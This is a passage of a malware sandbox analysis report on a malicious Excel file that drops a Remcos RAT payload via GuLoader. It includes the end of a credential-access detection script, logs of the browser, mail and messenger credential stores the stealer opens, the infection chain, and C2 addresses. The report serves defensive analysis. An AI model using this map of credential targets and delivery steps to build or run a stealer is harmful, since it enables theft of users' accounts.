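Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Program Files\Mozilla Firefox\firefox.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
""".strip().splitlines()

if __name__ == "__main__":
    for proc, cats in find_credential_access(SAMPLE_LINES).items():
        print(f"{proc}: {', '.join(cats)}")
```

          Two practical notes. First, key3.db and cert8.db are the legacy NSS files (Firefox 57 and earlier); current profiles keep the master key in key4.db and saved logins in logins.json, and a stealer that only knows the old names, as this sample appears to, will come back empty on an up-to-date profile, so the rule matches both generations. Second, the stealer probes the NSS files with volume-information queries (the "Queries volume information" lines above) before opening them in the section that follows, which is why both action types are parsed; on a live host, note that Sysmon records file creation and registry value writes but not file reads or key opens, so this particular footprint needs EDR file-open telemetry or object-access auditing (SACLs) on the profile directories and account keys to be visible outside a sandbox.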

          Stealing of Sensitive Information

          Source: Yara matchFile source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Vaccinerende.exe PID: 3116, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: ESMTPPassword35_2_004033F0
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword35_2_00402DB3
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword35_2_00402DB3

          Remote Access Functionality

          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
          Source: Yara matchFile source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Vaccinerende.exe PID: 3116, type: MEMORYSTR
          MITRE ATT&CK Matrix (one column per tactic; techniques matched by signatures carry the signature-count badge in front of the name, copied as extracted)

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | 11 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 21 Obfuscated Files or Information | 2 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 1 Shared Modules | 1 Registry Run Keys / Startup Folder | 311 Process Injection | 1 Install Root Certificate | 1 Credentials In Files | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | 13 Exploitation for Client Execution | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 1110 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | 113 Command and Scripting Interpreter | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 11 Security Software Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | 3 PowerShell | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 23 Application Layer Protocol | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 311 Process Injection | Network Sniffing | 1 Remote System Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 1522508 | Sample: PO 11001 .xls | Startdate: 30/09/2024 | Architecture: WINDOWS | Score: 100

          Top-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected GuLoader; 12 other signatures

          Process tree recovered from the behavior graph (numbers in brackets are the graph's own node ids):

          [13] EXCEL.EXE
              network: 192.3.220.22 (ports 49164, 49166, 49167; AS-COLOCROSSINGUS, United States); og1.in 104.21.78.54 (ports 443, 49163, 49168; CLOUDFLARENETUS, United States)
              dropped: C:\Users\user\Desktop\PO 11001 .xls (copy) [Composite]; C:\Users\...\cookienetbookinetcahce[1].hta [HTML]
              signatures: Microsoft Office drops suspicious files
              [22] mshta.exe
                  network: 172.67.216.244 (ports 443, 49165; CLOUDFLARENETUS, United States); og1.in
                  signatures: Suspicious command line found; PowerShell case anomaly found
                  [32] cmd.exe
                      signatures: Suspicious powershell command line found; PowerShell case anomaly found
                      [37] powershell.exe
                          dropped: C:\Users\user\AppData\Roaming\dllhost.exe [PE32]; C:\Users\user\AppData\...\dllhost[1].exe [PE32]; C:\Users\user\AppData\...\sm41lsyu.cmdline [Unicode]
                          signatures: Installs new ROOT certificates; Powershell drops PE file
                          [43] dllhost.exe
                              dropped: C:\Users\user\AppData\...\Aerognosy.Res [ASCII]
                              signatures: Suspicious powershell command line found
                              [53] powershell.exe
                                  dropped: C:\Users\user\AppData\...\Vaccinerende.exe [PE32]
                                  signatures: Writes to foreign memory regions; Powershell drops PE file
                                  [63] Vaccinerende.exe
                                      network: 107.173.4.16 (ports 2404, 49174, 49175; AS-COLOCROSSINGUS, United States); geoplugin.net 178.237.33.50 (ports 49176, 80; ATOM86-ASATOM86NL, Netherlands)
                                      signatures: Detected unpacking (changes PE section rights); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 3 other signatures
                                      [69] Vaccinerende.exe
                                          signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
                                      [72] Vaccinerende.exe
                                      [74] Vaccinerende.exe
                                      [76] 14 other processes
                                          signatures: Tries to harvest and steal browser information (history, passwords, etc)
                                          [78] reg.exe
                          [47] csc.exe
                              dropped: C:\Users\user\AppData\Local\...\sm41lsyu.dll [PE32]
                              [57] cvtres.exe
              [26] mshta.exe
                  network: og1.in
                  [35] cmd.exe
                      [41] powershell.exe
                          [49] dllhost.exe
                              [59] powershell.exe
                                  [67] Vaccinerende.exe
                          [51] csc.exe
                              dropped: C:\Users\user\AppData\Local\...\r4gn3nq1.dll [PE32]
                              [61] cvtres.exe
          [18] powershell.exe
              [28] powershell.exe
          [20] powershell.exe
              [30] powershell.exe

          Source | Detection | Scanner | Label | Link
          PO 11001 .xls | 29% | ReversingLabs | Win32.Exploit.CVE-2017-0199 |
          PO 11001 .xls | 25% | Virustotal | | Browse
          PO 11001 .xls | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          geoplugin.net | 0% | Virustotal | | Browse

          Source | Detection | Scanner | Label | Link
          http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
          https://contoso.com/License | 0% | URL Reputation | safe |
          https://contoso.com/ | 0% | URL Reputation | safe |
          https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
          http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
          https://contoso.com/Icon | 0% | URL Reputation | safe |
          http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
